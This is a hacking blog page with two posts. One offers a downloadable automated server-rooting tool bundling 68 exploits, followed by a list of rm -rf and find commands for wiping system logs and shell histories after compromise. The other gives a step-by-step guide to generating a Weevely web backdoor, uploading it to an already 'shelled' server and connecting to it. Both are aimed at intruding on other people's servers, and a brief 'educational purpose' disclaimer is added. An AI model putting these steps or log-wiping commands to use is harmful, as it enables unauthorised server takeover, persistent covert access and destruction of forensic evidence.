Showing posts with label Backtrack 5 r2 linux hacking. Show all posts

tHe-r00ter

Tool Name : ther00ter
Coded By  : Subir Sutradhar
Description : An Auto Server Rooting Tool


Usage : Upload The Script In Any Folder, And execute it
ex: python ther00ter.py , and then just wait and watch.




Download Link : Click Me


[NOTE] Some R00ting scripts needs commands, you can type "Help" to see the commands. Please Dont Comment Or Complaint If Any r00ting script doesnt work, because all r00ting scripts doesnt work on all web servers, and moreover the r00ting scripts are not made by Us. The tool is a house of 68 exploits, which would keep firing the exploits. To bypass any script which may get stuck or maybe you are not able to use the commands, press "ctrl+c" once. 




commands to clear logs after rooting

rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
history -c
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;



Also, Please Dont Comment For Asking An Explanation Of What Is rooting and how to do it, If you browsing This post, I suppose you have the right knowledge and you know what you are upto.

Contact: c0d3gray[AT]gmail[DOT]com

Note: If Anyone Wants To Share It In Their Personal Site Or Blog, You Are Free To Do So, Provided You Make A Proper Back-link To This Post. Otherwise Necessary Actions Would Be Taken Under DMCA Acts.

Feel Free To Leave A Comment If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You!
Read more

How to make a backdoor using Weevely - Backtrack 5 R2

Today Ill tell you how to use Weevely to make a backdoor from a server.
So now lets begin:-
I'm not goin to tell you about the commands of Linux
Requirements:-

  • Backtrack
  • Shelled Server
  • Basic knowledge of Linux commands
Here we go :)

  • Now open terminal, goto the directory cd /pentest/backdoors/web/weevely .It will look something like this

  • Now in the same directory type, ./weevely.py and then hit enter.[It will show you the usage of weevely]
  • Now type ./weevely.py generate <password> <location, where u want to save file> .It will look something like this

[Note:- 
  1. generate is used to make a file, which will be used by weevely, as a door between you and the server.]


  • Then upload that file in your shelled server, which you have make just in above step.
  • After uploading it, copy the url of your uploaded file. Then type ./weevely.py <url> <password> .It will look something like this

  • Now hit enter ;) 
  • Boom !! Now you are connected with the server :D .Here is a snapshot

Note:- This is only for educational purpose, we are not responsible to any harm or illegal activity done by you.

Feel Free To Leave A Comment If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You!
Read more